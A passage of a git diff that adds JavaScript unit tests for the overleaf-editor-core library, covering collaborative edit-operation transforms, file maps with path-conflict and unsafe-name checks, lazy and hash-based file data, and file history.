new DeleteCommentOperation('comm1') + + const [aPrime, bPrime] = EditOperationTransformer.transform(a, b) + expect(aPrime).to.be.an.instanceof(TextOperation) + expect(aPrime.toJSON()).to.eql(a.toJSON()) + expect(bPrime).to.be.an.instanceof(DeleteCommentOperation) + expect(bPrime.toJSON()).to.eql(b.toJSON()) + }) + + it('Transforms SetCommentStateOperation and TextOperation', function () { + const a = new TextOperation().retain(9).insert(' world') + const b = new SetCommentStateOperation('comm1', true) + + const [aPrime, bPrime] = EditOperationTransformer.transform(a, b) + expect(aPrime).to.be.an.instanceof(TextOperation) + expect(aPrime.toJSON()).to.eql(a.toJSON()) + expect(bPrime).to.be.an.instanceof(SetCommentStateOperation) + expect(bPrime.toJSON()).to.eql(b.toJSON()) + }) + + it('Transforms SetCommentStateOperation and AddCommentOperation', function () { + const a = new AddCommentOperation('comm1', [new Range(0, 1)]) + const b = new SetCommentStateOperation('comm1', true) + + const [aPrime, bPrime] = EditOperationTransformer.transform(a, b) + expect(aPrime).to.be.an.instanceof(AddCommentOperation) + expect(aPrime.toJSON()).to.deep.eql({ + commentId: 'comm1', + ranges: [{ pos: 0, length: 1 }], + resolved: true, + }) + expect(bPrime).to.be.an.instanceof(SetCommentStateOperation) + expect(bPrime.toJSON()).to.deep.eql(b.toJSON()) + }) + + it('Transforms SetCommentStateOperation and DeleteCommentOperation', function () { + const a = new DeleteCommentOperation('comm1') + const b = new SetCommentStateOperation('comm1', true) + + const [aPrime, bPrime] = EditOperationTransformer.transform(a, b) + expect(aPrime).to.be.an.instanceof(DeleteCommentOperation) + expect(aPrime.toJSON()).to.deep.eql(a.toJSON()) + expect(bPrime).to.be.an.instanceof(EditNoOperation) + }) + + it('Transforms SetCommentStateOperation and SetCommentStateOperation', function () { + const a = new SetCommentStateOperation('comm1', false) + const b = new SetCommentStateOperation('comm1', true) + + const [aPrime, bPrime] = EditOperationTransformer.transform(a, b) + expect(aPrime.toJSON()).to.deep.eql({ + commentId: 'comm1', + resolved: false, + }) + expect(bPrime).to.be.an.instanceof(EditNoOperation) + }) + + it('Transforms two SetCommentStateOperation with different commentId', function () { + const a = new SetCommentStateOperation('comm1', false) + const b = new SetCommentStateOperation('comm2', true) + + const [aPrime, bPrime] = EditOperationTransformer.transform(a, b) + expect(aPrime).to.be.an.instanceof(SetCommentStateOperation) + expect(aPrime.toJSON()).to.deep.eql(a.toJSON()) + expect(bPrime).to.be.an.instanceof(SetCommentStateOperation) + expect(bPrime.toJSON()).to.deep.eql(b.toJSON()) + }) +}) + +describe('EditOperationBuilder', function () { + it('Constructs TextOperation from JSON', function () { + const raw = { + textOperation: [1, 'foo', 3], + } + const op = EditOperationBuilder.fromJSON(raw) + expect(op).to.be.an.instanceof(TextOperation) + expect(op.toJSON()).to.deep.equal(raw) + }) + + it('Constructs AddCommentOperation from JSON', function () { + const raw = { + commentId: 'comm1', + ranges: [{ pos: 0, length: 1 }], + } + const op = EditOperationBuilder.fromJSON(raw) + expect(op).to.be.an.instanceof(AddCommentOperation) + expect(op.toJSON()).to.deep.equal(raw) + }) + + it('Constructs DeleteCommentOperation from JSON', function () { + const raw = { + deleteComment: 'comm1', + } + const op = EditOperationBuilder.fromJSON(raw) + expect(op).to.be.an.instanceof(DeleteCommentOperation) + 
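+    // round-trip: toJSON() should return exactly the raw form it was parsed from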
expect(op.toJSON()).to.deep.equal(raw) + }) + + it('Constructs SetCommentStateOperation from JSON', function () { + const raw = { + commentId: 'comm1', + resolved: true, + } + const op = EditOperationBuilder.fromJSON(raw) + expect(op).to.be.an.instanceof(SetCommentStateOperation) + expect(op.toJSON()).to.deep.equal(raw) + }) + + it('Constructs EditNoOperation from JSON', function () { + const raw = { noOp: true } + const op = EditOperationBuilder.fromJSON(raw) + expect(op).to.be.an.instanceof(EditNoOperation) + expect(op.toJSON()).to.deep.equal(raw) + }) + + it('Throws error for unsupported operation', function () { + const raw = { + unsupportedOperation: { + op: 'foo', + }, + } + expect(() => EditOperationBuilder.fromJSON(raw)).to.throw( + 'Unsupported operation in EditOperationBuilder.fromJSON' + ) + }) + + it('Constructs TextOperation from JSON (randomised)', function () { + const str = random.string(50) + const randomOperation = randomTextOperation(str) + const op = EditOperationBuilder.fromJSON(randomOperation.toJSON()) + expect(op).to.be.an.instanceof(TextOperation) + expect(op.equals(randomOperation)).to.be.true + }) +}) diff --git a/libraries/overleaf-editor-core/test/file.test.js b/libraries/overleaf-editor-core/test/file.test.js new file mode 100644 index 0000000..6c96d97 --- /dev/null +++ b/libraries/overleaf-editor-core/test/file.test.js @@ -0,0 +1,96 @@ +'use strict' + +const { expect } = require('chai') +const FakeBlobStore = require('./support/fake_blob_store') +const ot = require('..') +const File = ot.File + +describe('File', function () { + it('can have attached metadata', function () { + // no metadata + let file = File.fromString('foo') + expect(file.getMetadata()).to.eql({}) + + // metadata passed in at construction time + file = File.fromString('foo', { main: true }) + expect(file.getMetadata()).to.eql({ main: true }) + + // metadata set at runtime + file.setMetadata({ main: false }) + expect(file.getMetadata()).to.eql({ main: false }) + }) + + describe('toRaw', function () { + it('returns non-empty metadata', function () { + const metadata = { main: true } + const file = File.fromHash(File.EMPTY_FILE_HASH, undefined, metadata) + expect(file.toRaw()).to.eql({ + hash: File.EMPTY_FILE_HASH, + metadata, + }) + + delete file.getMetadata().main + expect(file.toRaw()).to.eql({ hash: File.EMPTY_FILE_HASH }) + }) + + it('returns a deep clone of metadata', function () { + const metadata = { externalFile: { id: 123 } } + const file = File.fromHash(File.EMPTY_FILE_HASH, undefined, metadata) + const raw = file.toRaw() + const fileMetadata = file.getMetadata() + const rawMetadata = raw.metadata + expect(rawMetadata).not.to.equal(fileMetadata) + expect(rawMetadata).to.deep.equal(fileMetadata) + }) + }) + + describe('store', function () { + it('does not return empty metadata', async function () { + const file = File.fromHash(File.EMPTY_FILE_HASH) + const fakeBlobStore = new FakeBlobStore() + const raw = await file.store(fakeBlobStore) + expect(raw).to.eql({ hash: File.EMPTY_FILE_HASH }) + }) + + it('returns non-empty metadata', async function () { + const metadata = { main: true } + const file = File.fromHash(File.EMPTY_FILE_HASH, undefined, metadata) + const fakeBlobStore = new FakeBlobStore() + const raw = await file.store(fakeBlobStore) + expect(raw).to.eql({ + hash: File.EMPTY_FILE_HASH, + metadata, + }) + }) + + it('returns a deep clone of metadata', async function () { + const metadata = { externalFile: { id: 123 } } + const file = File.fromHash(File.EMPTY_FILE_HASH, 
undefined, metadata)
+      const fakeBlobStore = new FakeBlobStore()
+      const raw = await file.store(fakeBlobStore)
+      raw.metadata.externalFile.id = 456
+      expect(file.getMetadata().externalFile.id).to.equal(123)
+    })
+  })
+
+  describe('with string data', function () {
+    it('can be created from a string', function () {
+      const file = File.fromString('foo')
+      expect(file.getContent()).to.equal('foo')
+    })
+  })
+
+  describe('with hollow string data', function () {
+    it('can be cloned', function () {
+      const file = File.createHollow(null, 0)
+      expect(file.getStringLength()).to.equal(0)
+      const clone = file.clone()
+      expect(clone.getStringLength()).to.equal(0)
+    })
+  })
+
+  it('getComments() returns an empty comment list', function () {
+    const file = File.fromString('foo')
+    expect(file.getComments().toRaw()).to.eql([])
+  })
+})
diff --git a/libraries/overleaf-editor-core/test/file_map.test.js b/libraries/overleaf-editor-core/test/file_map.test.js
new file mode 100644
index 0000000..7dc1b70
--- /dev/null
+++ b/libraries/overleaf-editor-core/test/file_map.test.js
@@ -0,0 +1,195 @@
+'use strict'
+
+const { expect } = require('chai')
+const _ = require('lodash')
+
+const ot = require('..')
+const File = ot.File
+const FileMap = ot.FileMap
+
+describe('FileMap', function () {
+  function makeTestFile(pathname) {
+    return File.fromString(pathname)
+  }
+
+  function makeTestFiles(pathnames) {
+    return _.zipObject(pathnames, _.map(pathnames, makeTestFile))
+  }
+
+  function makeFileMap(pathnames) {
+    return new FileMap(makeTestFiles(pathnames))
+  }
+
+  it('allows construction with a single file', function () {
+    makeFileMap(['a'])
+  })
+
+  it('allows folders to differ by case', function () {
+    expect(() => {
+      makeFileMap(['a/b', 'A/c'])
+    }).not.to.throw()
+    expect(() => {
+      makeFileMap(['a/b/c', 'A/b/d'])
+    }).not.to.throw()
+    expect(() => {
+      makeFileMap(['a/b/c', 'a/B/d'])
+    }).not.to.throw()
+  })
+
+  it('does not allow conflicting paths on construct', function () {
+    expect(() => {
+      makeFileMap(['a', 'a/b'])
+    }).to.throw(FileMap.PathnameConflictError)
+  })
+
+  it('detects conflicting paths with characters that sort before /', function () {
+    const fileMap = makeFileMap(['a', 'a!'])
+    expect(fileMap.wouldConflict('a/b')).to.be.true
+  })
+
+  it('detects conflicting paths', function () {
+    const fileMap = makeFileMap(['a/b/c'])
+    expect(fileMap.wouldConflict('a/b/c/d')).to.be.true
+    expect(fileMap.wouldConflict('a')).to.be.true
+    expect(fileMap.wouldConflict('b')).to.be.false
+    expect(fileMap.wouldConflict('a/b')).to.be.true
+    expect(fileMap.wouldConflict('a/c')).to.be.false
+    expect(fileMap.wouldConflict('a/b/c')).to.be.false
+    expect(fileMap.wouldConflict('a/b/d')).to.be.false
+    expect(fileMap.wouldConflict('d/b/c')).to.be.false
+  })
+
+  it('allows paths that differ by case', function () {
+    const fileMap = makeFileMap(['a/b/c'])
+    expect(fileMap.wouldConflict('a/b/C')).to.be.false
+    expect(fileMap.wouldConflict('A')).to.be.false
+    expect(fileMap.wouldConflict('A/b')).to.be.false
+    expect(fileMap.wouldConflict('a/B')).to.be.false
+    expect(fileMap.wouldConflict('A/B')).to.be.false
+  })
+
+  it('does not add a file with a conflicting path', function () {
+    const fileMap = makeFileMap(['a/b'])
+    const file = makeTestFile('a/b/c')
+
+    expect(() => {
+      fileMap.addFile('a/b/c', file)
+    }).to.throw(FileMap.PathnameConflictError)
+  })
+
+  it('does not move a file to a conflicting path', function () {
+    const fileMap = makeFileMap(['a/b', 'a/c'])
+
+    expect(() => {
+      fileMap.moveFile('a/b', 'a')
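+      // 'a' is a non-empty folder here ('a/c' still exists), so this must throw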
}).to.throw(FileMap.PathnameConflictError) + }) + + it('errors when trying to move a non-existent file', function () { + const fileMap = makeFileMap(['a']) + expect(() => fileMap.moveFile('b', 'a')).to.throw(FileMap.FileNotFoundError) + }) + + it('moves a file over an empty folder', function () { + const fileMap = makeFileMap(['a/b']) + fileMap.moveFile('a/b', 'a') + expect(fileMap.countFiles()).to.equal(1) + expect(fileMap.getFile('a')).to.exist + expect(fileMap.getFile('a').getContent()).to.equal('a/b') + }) + + it('does not move a file over a non-empty folder', function () { + const fileMap = makeFileMap(['a/b', 'a/c']) + expect(() => { + fileMap.moveFile('a/b', 'a') + }).to.throw(FileMap.PathnameConflictError) + }) + + it('does not overwrite filename that differs by case on add', function () { + const fileMap = makeFileMap(['a']) + fileMap.addFile('A', makeTestFile('A')) + expect(fileMap.countFiles()).to.equal(2) + expect(fileMap.files.a).to.exist + expect(fileMap.files.A).to.exist + expect(fileMap.getFile('a')).to.exist + expect(fileMap.getFile('A').getContent()).to.equal('A') + }) + + it('changes case on move', function () { + const fileMap = makeFileMap(['a']) + fileMap.moveFile('a', 'A') + expect(fileMap.countFiles()).to.equal(1) + expect(fileMap.files.a).not.to.exist + expect(fileMap.files.A).to.exist + expect(fileMap.getFile('A').getContent()).to.equal('a') + }) + + it('does not overwrite filename that differs by case on move', function () { + const fileMap = makeFileMap(['a', 'b']) + fileMap.moveFile('a', 'B') + expect(fileMap.countFiles()).to.equal(2) + expect(fileMap.files.a).not.to.exist + expect(fileMap.files.b).to.exist + expect(fileMap.files.B).to.exist + expect(fileMap.getFile('B').getContent()).to.equal('a') + }) + + it('does not find pathname that differs by case', function () { + const fileMap = makeFileMap(['a']) + expect(fileMap.getFile('a')).to.exist + expect(fileMap.getFile('A')).not.to.exist + expect(fileMap.getFile('b')).not.to.exist + }) + + it('does not allow non-safe pathnames', function () { + expect(() => { + makeFileMap(['c*']) + }).to.throw(FileMap.BadPathnameError) + + const fileMap = makeFileMap([]) + + expect(() => { + fileMap.addFile('c*', makeTestFile('c:')) + }).to.throw(FileMap.BadPathnameError) + + fileMap.addFile('a', makeTestFile('a')) + expect(() => { + fileMap.moveFile('a', 'c*') + }).to.throw(FileMap.BadPathnameError) + + expect(() => { + fileMap.addFile('hasOwnProperty', makeTestFile('hasOwnProperty')) + fileMap.addFile('anotherFile', makeTestFile('anotherFile')) + }).to.throw() + }) + + it('removes a file', function () { + const fileMap = makeFileMap(['a', 'b']) + fileMap.removeFile('a') + expect(fileMap.countFiles()).to.equal(1) + expect(fileMap.files.a).not.to.exist + expect(fileMap.files.b).to.exist + }) + + it('errors when trying to remove a non-existent file', function () { + const fileMap = makeFileMap(['a']) + expect(() => fileMap.removeFile('b')).to.throw(FileMap.FileNotFoundError) + }) + + it('has mapAsync', async function () { + const concurrency = 1 + for (const test of [ + [[], {}], + [['a'], { a: 'a-a' }], // the test is to map to "content-pathname" + [['a', 'b'], { a: 'a-a', b: 'b-b' }], + ]) { + const input = test[0] + const expectedOutput = test[1] + const fileMap = makeFileMap(input) + const result = await fileMap.mapAsync((file, pathname) => { + return file.getContent() + '-' + pathname + }, concurrency) + expect(result).to.deep.equal(expectedOutput) + } + }) +}) diff --git 
a/libraries/overleaf-editor-core/test/hash_file_data.test.js b/libraries/overleaf-editor-core/test/hash_file_data.test.js new file mode 100644 index 0000000..cf7ff56 --- /dev/null +++ b/libraries/overleaf-editor-core/test/hash_file_data.test.js @@ -0,0 +1,124 @@ +const HashFileData = require('../lib/file_data/hash_file_data') +const { expect } = require('chai') +const StringFileData = require('../lib/file_data/string_file_data') +const sinon = require('sinon') +const Blob = require('../lib/blob') + +describe('HashFileData', function () { + beforeEach(function () { + this.fileHash = 'a5675307b61ec2517330622a6e649b4ca1ee5612' + this.rangesHash = '380de212d09bf8498065833dbf242aaf11184316' + this.blobStore = { + getString: sinon.stub(), + getObject: sinon.stub(), + getBlob: sinon.stub(), + } + }) + + describe('constructor', function () { + it('should create a new instance of HashFileData from content hash and ranges hash', function () { + const fileData = new HashFileData(this.fileHash, this.rangesHash) + + expect(fileData).to.be.instanceOf(HashFileData) + expect(fileData.getHash()).to.equal(this.fileHash) + expect(fileData.getRangesHash()).to.equal(this.rangesHash) + }) + + it('should create a new instance of HashFileData with no ranges hash', function () { + const fileData = new HashFileData(this.fileHash) + expect(fileData).to.be.instanceOf(HashFileData) + expect(fileData.getHash()).to.equal(this.fileHash) + expect(fileData.getRangesHash()).to.be.undefined + }) + }) + + describe('fromRaw', function () { + it('should create a new instance of HashFileData from raw data', function () { + const raw = { hash: this.fileHash, rangesHash: this.rangesHash } + const fileData = HashFileData.fromRaw(raw) + + expect(fileData).to.be.instanceOf(HashFileData) + expect(fileData.getHash()).to.equal(raw.hash) + expect(fileData.getRangesHash()).to.equal(raw.rangesHash) + }) + + it('should create a new instance of HashFileData from raw data without ranges hash', function () { + const raw = { hash: this.fileHash } + const fileData = HashFileData.fromRaw(raw) + + expect(fileData).to.be.instanceOf(HashFileData) + expect(fileData.getHash()).to.equal(raw.hash) + expect(fileData.getRangesHash()).to.equal(undefined) + }) + }) + + describe('toRaw', function () { + it('should include ranges hash when present', function () { + const fileData = new HashFileData(this.fileHash, this.rangesHash) + const raw = fileData.toRaw() + expect(raw).to.deep.equal({ + hash: this.fileHash, + rangesHash: this.rangesHash, + }) + }) + + it('should omit ranges hash when not present', function () { + const fileData = new HashFileData(this.fileHash) + const raw = fileData.toRaw() + expect(raw).to.deep.equal({ + hash: this.fileHash, + }) + }) + }) + + describe('toEager', function () { + it('should convert HashFileData to StringFileData including ranges', async function () { + const trackedChanges = [ + { + range: { pos: 5, length: 10 }, + tracking: { + userId: 'foo', + type: 'insert', + ts: '2024-01-01T00:00:00.000Z', + }, + }, + ] + const comments = [ + { + id: 'comment-1', + ranges: [{ pos: 1, length: 4 }], + }, + ] + const fileData = new HashFileData(this.fileHash, this.rangesHash) + this.blobStore.getString.withArgs(this.fileHash).resolves('content') + this.blobStore.getObject.withArgs(this.rangesHash).resolves({ + trackedChanges, + comments, + }) + this.blobStore.getBlob + .withArgs(this.rangesHash) + .resolves(new Blob(this.rangesHash, 20, 20)) + this.blobStore.getBlob + .withArgs(this.fileHash) + .resolves(new Blob(this.fileHash, 20, 
20)) + const eagerFileData = await fileData.toEager(this.blobStore) + expect(eagerFileData).to.be.instanceOf(StringFileData) + expect(eagerFileData.getContent()).to.equal('content') + expect(eagerFileData.trackedChanges.toRaw()).to.deep.equal(trackedChanges) + expect(eagerFileData.getComments().toRaw()).to.deep.equal(comments) + }) + + it('should convert HashFileData to StringFileData without ranges', async function () { + const fileData = new HashFileData(this.fileHash, undefined) + this.blobStore.getString.withArgs(this.fileHash).resolves('content') + this.blobStore.getBlob + .withArgs(this.fileHash) + .resolves(new Blob(this.fileHash, 20, 20)) + const eagerFileData = await fileData.toEager(this.blobStore) + expect(eagerFileData).to.be.instanceOf(StringFileData) + expect(eagerFileData.getContent()).to.equal('content') + expect(eagerFileData.trackedChanges.toRaw()).to.deep.equal([]) + expect(eagerFileData.getComments().toRaw()).to.deep.equal([]) + }) + }) +}) diff --git a/libraries/overleaf-editor-core/test/history.test.js b/libraries/overleaf-editor-core/test/history.test.js new file mode 100644 index 0000000..c5be9d8 --- /dev/null +++ b/libraries/overleaf-editor-core/test/history.test.js @@ -0,0 +1,42 @@ +'use strict' + +const { expect } = require('chai') +const core = require('..') +const Change = core.Change +const File = core.File +const History = core.History +const Operation = core.Operation +const Snapshot = core.Snapshot + +describe('History', function () { + describe('findBlobHashes', function () { + it('finds blob hashes from snapshot and changes', function () { + const history = new History(new Snapshot(), []) + + const blobHashes = new Set() + history.findBlobHashes(blobHashes) + expect(blobHashes.size).to.equal(0) + + // Add a file with a hash to the snapshot. + history.getSnapshot().addFile('foo', File.fromHash(File.EMPTY_FILE_HASH)) + history.findBlobHashes(blobHashes) + expect(Array.from(blobHashes)).to.have.members([File.EMPTY_FILE_HASH]) + + // Add a file with a hash to the changes. 
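+    // (findBlobHashes accumulates into the set passed in, so the snapshot's
+    // hash found above should still be present afterwards)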
+ const testHash = 'a'.repeat(40) + const change = Change.fromRaw({ + operations: [], + timestamp: '2015-03-05T12:03:53.035Z', + authors: [null], + }) + change.pushOperation(Operation.addFile('bar', File.fromHash(testHash))) + + history.pushChanges([change]) + history.findBlobHashes(blobHashes) + expect(Array.from(blobHashes)).to.have.members([ + File.EMPTY_FILE_HASH, + testHash, + ]) + }) + }) +}) diff --git a/libraries/overleaf-editor-core/test/hollow_string_file_data.test.js b/libraries/overleaf-editor-core/test/hollow_string_file_data.test.js new file mode 100644 index 0000000..e40fec2 --- /dev/null +++ b/libraries/overleaf-editor-core/test/hollow_string_file_data.test.js @@ -0,0 +1,22 @@ +'use strict' + +const { expect } = require('chai') +const ot = require('..') +const HollowStringFileData = require('../lib/file_data/hollow_string_file_data') +const TextOperation = ot.TextOperation + +describe('HollowStringFileData', function () { + it('validates string length when edited', function () { + const maxLength = TextOperation.MAX_STRING_LENGTH + const fileData = new HollowStringFileData(maxLength) + expect(fileData.getStringLength()).to.equal(maxLength) + + expect(() => { + fileData.edit(new TextOperation().retain(maxLength).insert('x')) + }).to.throw(TextOperation.TooLongError) + expect(fileData.getStringLength()).to.equal(maxLength) + + fileData.edit(new TextOperation().retain(maxLength - 1).remove(1)) + expect(fileData.getStringLength()).to.equal(maxLength - 1) + }) +}) diff --git a/libraries/overleaf-editor-core/test/label.test.js b/libraries/overleaf-editor-core/test/label.test.js new file mode 100644 index 0000000..448b6f0 --- /dev/null +++ b/libraries/overleaf-editor-core/test/label.test.js @@ -0,0 +1,17 @@ +'use strict' + +const { expect } = require('chai') +const ot = require('..') +const Label = ot.Label + +describe('Label', function () { + it('can be created by an anonymous author', function () { + const label = Label.fromRaw({ + text: 'test', + authorId: null, + timestamp: '2016-01-01T00:00:00Z', + version: 123, + }) + expect(label.getAuthorId()).to.be.null + }) +}) diff --git a/libraries/overleaf-editor-core/test/lazy_string_file_data.test.js b/libraries/overleaf-editor-core/test/lazy_string_file_data.test.js new file mode 100644 index 0000000..4c9f4aa --- /dev/null +++ b/libraries/overleaf-editor-core/test/lazy_string_file_data.test.js @@ -0,0 +1,196 @@ +// @ts-check +'use strict' + +const _ = require('lodash') +const { expect } = require('chai') +const sinon = require('sinon') + +const ot = require('..') +const File = ot.File +const TextOperation = ot.TextOperation +const LazyStringFileData = require('../lib/file_data/lazy_string_file_data') +const EagerStringFileData = require('../lib/file_data/string_file_data') + +describe('LazyStringFileData', function () { + beforeEach(function () { + this.rangesHash = '380de212d09bf8498065833dbf242aaf11184316' + this.fileHash = 'a5675307b61ec2517330622a6e649b4ca1ee5612' + this.blobStore = { + getString: sinon.stub(), + putString: sinon.stub().resolves(new ot.Blob(this.fileHash, 19, 19)), + getObject: sinon.stub(), + putObject: sinon.stub().resolves(new ot.Blob(this.rangesHash, 204, 204)), + } + this.blobStore.getString.withArgs(File.EMPTY_FILE_HASH).resolves('') + this.blobStore.getString + .withArgs(this.fileHash) + .resolves('the quick brown fox') + this.blobStore.getObject.withArgs(this.rangesHash).resolves({ + comments: [{ id: 'foo', ranges: [{ pos: 0, length: 3 }] }], + trackedChanges: [ + { + range: { pos: 4, length: 5 }, + 
tracking: {
+            type: 'delete',
+            userId: 'user1',
+            ts: '2024-01-01T00:00:00.000Z',
+          },
+        },
+      ],
+    })
+  })
+
+  it('uses raw text operations for toRaw and fromRaw', function () {
+    const testHash = File.EMPTY_FILE_HASH
+    const fileData = new LazyStringFileData(testHash, undefined, 0)
+    let roundTripFileData
+
+    expect(fileData.toRaw()).to.deep.equal({
+      hash: testHash,
+      stringLength: 0,
+    })
+    roundTripFileData = LazyStringFileData.fromRaw(fileData.toRaw())
+    expect(roundTripFileData.getHash()).to.equal(testHash)
+    expect(roundTripFileData.getStringLength()).to.equal(0)
+    expect(roundTripFileData.getOperations()).to.have.length(0)
+
+    fileData.edit(new TextOperation().insert('a'))
+    expect(fileData.toRaw()).to.deep.equal({
+      hash: testHash,
+      stringLength: 1,
+      operations: [{ textOperation: ['a'] }],
+    })
+    roundTripFileData = LazyStringFileData.fromRaw(fileData.toRaw())
+    expect(roundTripFileData.getHash()).not.to.exist // file has changed
+    expect(roundTripFileData.getStringLength()).to.equal(1)
+    expect(roundTripFileData.getOperations()).to.have.length(1)
+    expect(roundTripFileData.getOperations()[0]).to.be.instanceOf(TextOperation)
+    expect(
+      /** @type {InstanceType<typeof TextOperation>} */ (
+        roundTripFileData.getOperations()[0]
+      ).ops
+    ).to.have.length(1)
+
+    fileData.edit(new TextOperation().retain(1).insert('b'))
+    expect(fileData.toRaw()).to.deep.equal({
+      hash: testHash,
+      stringLength: 2,
+      operations: [{ textOperation: ['a'] }, { textOperation: [1, 'b'] }],
+    })
+    roundTripFileData = LazyStringFileData.fromRaw(fileData.toRaw())
+    expect(roundTripFileData.getHash()).not.to.exist // file has changed
+    expect(roundTripFileData.getStringLength()).to.equal(2)
+    expect(roundTripFileData.getOperations()).to.have.length(2)
+    expect(
+      /** @type {InstanceType<typeof TextOperation>} */ (
+        roundTripFileData.getOperations()[0]
+      ).ops
+    ).to.have.length(1)
+    expect(
+      /** @type {InstanceType<typeof TextOperation>} */ (
+        roundTripFileData.getOperations()[1]
+      ).ops
+    ).to.have.length(2)
+  })
+
+  it('should include rangesHash in toRaw and fromRaw when available', function () {
+    const testHash = File.EMPTY_FILE_HASH
+    const rangesHash = this.rangesHash
+    const fileData = new LazyStringFileData(testHash, rangesHash, 19)
+
+    expect(fileData.toRaw()).to.deep.equal({
+      hash: testHash,
+      rangesHash,
+      stringLength: 19,
+    })
+
+    const roundTripFileData = LazyStringFileData.fromRaw(fileData.toRaw())
+    expect(roundTripFileData.getHash()).to.equal(testHash)
+    expect(roundTripFileData.getRangesHash()).to.equal(rangesHash)
+    expect(roundTripFileData.getStringLength()).to.equal(19)
+    expect(roundTripFileData.getOperations()).to.have.length(0)
+  })
+
+  it('should fetch content from blob store when loading eager string', async function () {
+    const testHash = this.fileHash
+    const rangesHash = this.rangesHash
+    const fileData = new LazyStringFileData(testHash, rangesHash, 19)
+    const eagerString = await fileData.toEager(this.blobStore)
+    expect(eagerString).to.be.instanceOf(EagerStringFileData)
+    expect(eagerString.getContent()).to.equal('the quick brown fox')
+    expect(eagerString.getComments().toRaw()).to.deep.equal([
+      { id: 'foo', ranges: [{ pos: 0, length: 3 }] },
+    ])
+    expect(eagerString.trackedChanges.toRaw()).to.deep.equal([
+      {
+        range: { pos: 4, length: 5 },
+        tracking: {
+          type: 'delete',
+          userId: 'user1',
+          ts: '2024-01-01T00:00:00.000Z',
+        },
+      },
+    ])
+    expect(this.blobStore.getObject.calledWith(rangesHash)).to.be.true
+    expect(this.blobStore.getString.calledWith(testHash)).to.be.true
+  })
+
+  it('should not fetch ranges from blob store if not 
present', async function () { + const testHash = this.fileHash + const fileData = new LazyStringFileData(testHash, undefined, 19) + const eagerString = await fileData.toEager(this.blobStore) + expect(eagerString).to.be.instanceOf(EagerStringFileData) + expect(eagerString.getContent()).to.equal('the quick brown fox') + expect(eagerString.getComments().toRaw()).to.be.empty + expect(eagerString.trackedChanges.length).to.equal(0) + expect(this.blobStore.getObject.called).to.be.false + expect(this.blobStore.getString.calledWith(testHash)).to.be.true + }) + + it('validates operations when edited', function () { + const testHash = File.EMPTY_FILE_HASH + const fileData = new LazyStringFileData(testHash, undefined, 0) + expect(fileData.getHash()).equal(testHash) + expect(fileData.getByteLength()).to.equal(0) // approximately + expect(fileData.getStringLength()).to.equal(0) + expect(fileData.getOperations()).to.have.length(0) + + fileData.edit(new TextOperation().insert('a')) + expect(fileData.getHash()).not.to.exist + expect(fileData.getByteLength()).to.equal(1) // approximately + expect(fileData.getStringLength()).to.equal(1) + expect(fileData.getOperations()).to.have.length(1) + + expect(() => { + fileData.edit(new TextOperation().retain(10)) + }).to.throw(TextOperation.ApplyError) + expect(fileData.getHash()).not.to.exist + expect(fileData.getByteLength()).to.equal(1) // approximately + expect(fileData.getStringLength()).to.equal(1) + expect(fileData.getOperations()).to.have.length(1) + }) + + it('validates string length when edited', function () { + const testHash = File.EMPTY_FILE_HASH + const fileData = new LazyStringFileData(testHash, undefined, 0) + expect(fileData.getHash()).equal(testHash) + expect(fileData.getByteLength()).to.equal(0) // approximately + expect(fileData.getStringLength()).to.equal(0) + expect(fileData.getOperations()).to.have.length(0) + + const longString = _.repeat('a', TextOperation.MAX_STRING_LENGTH) + fileData.edit(new TextOperation().insert(longString)) + expect(fileData.getHash()).not.to.exist + expect(fileData.getByteLength()).to.equal(longString.length) // approximate + expect(fileData.getStringLength()).to.equal(longString.length) + expect(fileData.getOperations()).to.have.length(1) + + expect(() => { + fileData.edit(new TextOperation().retain(longString.length).insert('x')) + }).to.throw(TextOperation.TooLongError) + expect(fileData.getHash()).not.to.exist + expect(fileData.getByteLength()).to.equal(longString.length) // approximate + expect(fileData.getStringLength()).to.equal(longString.length) + expect(fileData.getOperations()).to.have.length(1) + }) +}) diff --git a/libraries/overleaf-editor-core/test/move_file_operation.test.js b/libraries/overleaf-editor-core/test/move_file_operation.test.js new file mode 100644 index 0000000..d8bf923 --- /dev/null +++ b/libraries/overleaf-editor-core/test/move_file_operation.test.js @@ -0,0 +1,64 @@ +'use strict' + +const { expect } = require('chai') +const ot = require('..') +const File = ot.File +const MoveFileOperation = ot.MoveFileOperation +const Snapshot = ot.Snapshot +const Operation = ot.Operation +const V2DocVersions = ot.V2DocVersions +const TextOperation = ot.TextOperation + +describe('MoveFileOperation', function () { + function makeEmptySnapshot() { + return new Snapshot() + } + + function makeOneFileSnapshot() { + const snapshot = makeEmptySnapshot() + snapshot.addFile('foo', File.fromString('test: foo')) + return snapshot + } + + function makeTwoFileSnapshot() { + const snapshot = makeOneFileSnapshot() + 
snapshot.addFile('bar', File.fromString('test: bar')) + return snapshot + } + + it('moves a file over another', function () { + const snapshot = makeOneFileSnapshot() + const operation = new MoveFileOperation('foo', 'bar') + operation.applyTo(snapshot) + expect(snapshot.countFiles()).to.equal(1) + expect(snapshot.getFile('bar').getContent()).to.equal('test: foo') + }) + + it('moves a file to another pathname', function () { + const snapshot = makeTwoFileSnapshot() + const operation = new MoveFileOperation('foo', 'a') + operation.applyTo(snapshot) + expect(snapshot.countFiles()).to.equal(2) + expect(snapshot.getFile('a').getContent()).to.equal('test: foo') + expect(snapshot.getFile('bar').getContent()).to.equal('test: bar') + }) + + it('should keep v2DocVersions in-sync', function () { + const snapshot = makeTwoFileSnapshot() + snapshot.setV2DocVersions( + V2DocVersions.fromRaw({ + id1: { pathname: 'foo', v: 1 }, + id2: { pathname: 'bar', v: 1 }, + }) + ) + Operation.moveFile('foo', 'foo-after').applyTo(snapshot) + Operation.editFile( + 'foo-after', + TextOperation.fromJSON({ textOperation: [9, 'edit'] }) + ).applyTo(snapshot) + Operation.removeFile('bar').applyTo(snapshot) + expect(snapshot.getV2DocVersions().toRaw()).to.deep.equal({ + id1: { pathname: 'foo-after', v: 1 }, + }) + }) +}) diff --git a/libraries/overleaf-editor-core/test/operation.test.js b/libraries/overleaf-editor-core/test/operation.test.js new file mode 100644 index 0000000..c2edc66 --- /dev/null +++ b/libraries/overleaf-editor-core/test/operation.test.js @@ -0,0 +1,1074 @@ +'use strict' + +const _ = require('lodash') +const { expect } = require('chai') + +const ot = require('..') +const StringFileData = require('../lib/file_data/string_file_data') +const File = ot.File +const AddFileOperation = ot.AddFileOperation +const MoveFileOperation = ot.MoveFileOperation +const EditFileOperation = ot.EditFileOperation +const NoOperation = ot.NoOperation +const Operation = ot.Operation +const TextOperation = ot.TextOperation +const AddCommentOperation = ot.AddCommentOperation +const DeleteCommentOperation = ot.DeleteCommentOperation +const SetCommentStateOperation = ot.SetCommentStateOperation +const 